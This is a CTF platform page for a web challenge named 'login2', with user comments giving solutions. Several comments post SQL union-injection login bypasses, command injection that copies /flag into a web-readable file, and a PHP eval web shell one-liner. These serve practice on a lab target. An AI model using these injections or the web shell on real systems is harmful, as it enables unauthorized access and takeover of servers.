login2WEB 未解决

分数: 40 金币: 6
题目作者: 未知
一  血: ShawRoot
一血奖励: 5金币
解  决: 2258
提  示: 命令执行
描  述:
login2
评论
5883120xly 13天前

username= ' UNION SELECT '任意用户名', 'fae0b27c451c728867a567e8c1bb4e53' -- password=666 进入命令执行界面输入 666 | cat /flag >2.txt 访问http://117.72.52.127:14324/2.txt即可

回复 0

你文博哥哥 2月前

首先爆破,没出来,sqlmap扫了,账号密码为空,丫的,没法去找有用信息,源码,请求头,都没,最后在返回包找到了tip,解码,得到注入点,username输入admin'union select 1,md5(123)#&password(123),得到监控系统,然后看见输入框,想到了rce,然后尝试输入1,然后输入ls /,没回显,被过滤,后面利用tee命令,将查找写入新文件,访问即可

回复 0

一个姓⎝李⎠的师傅~ 2月前

做了 3 个小时,完整记录了自己的 25 个步骤,sqlmap 省略了因为没有可用信息! 来看看吧,肯定会对你有帮助,联合注入的发现,命令执行写入文件绕过没有网页回显命令内容的办法,包括路径的讲解: https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#zIr77

回复 2

꧁༺༽༾ཊCCཏ༿༼༻꧂ 2月前

没难度

回复 0

六分之杰 2月前

https://zhuanlan.zhihu.com/p/7343164566

回复 0

D调丶Slayer 2月前

https://blog.csdn.net/weixin_58111246/article/details/123482301?spm=1001.2014.3001.5501

回复 0

19957910119 3月前

1&&echo '<?php @eval($_POST['shell']);phpinfo();?>'>test.php

回复 0

ctfer-pls 3月前

看了评论厉害了

回复 0

ilovevicky99 4月前

用反弹shell的方法,为什么没有回显呀

回复 0

zhuizhui 4月前

' UNION SELECT 'admin' , '99754106633f94d350db34d548d6091a' FROM DUAL;#-- 123;cat /flag > test

回复 0

WriteUp

image
harry

6 金币

评分(9)

解题动态

nusse 攻破了该题 16小时前
奔跑的开开 攻破了该题 21小时前
worthwhile 攻破了该题 1天前
17312257750 攻破了该题 1天前
wyjzzzz 攻破了该题 2天前
Baidu15 攻破了该题 2天前
tsx03 攻破了该题 2天前
deng64 攻破了该题 2天前
jaykd 攻破了该题 2天前
1348931180 攻破了该题 3天前
BeiZzzhou 攻破了该题 4天前
Ming1813 攻破了该题 5天前
cyhito 攻破了该题 5天前
ysy126 攻破了该题 6天前
18394165790 攻破了该题 6天前
怡宝 攻破了该题 6天前
nicola 攻破了该题 8天前
13117623629 攻破了该题 8天前
221603010926 攻破了该题 8天前
jzys 攻破了该题 8天前
问题反馈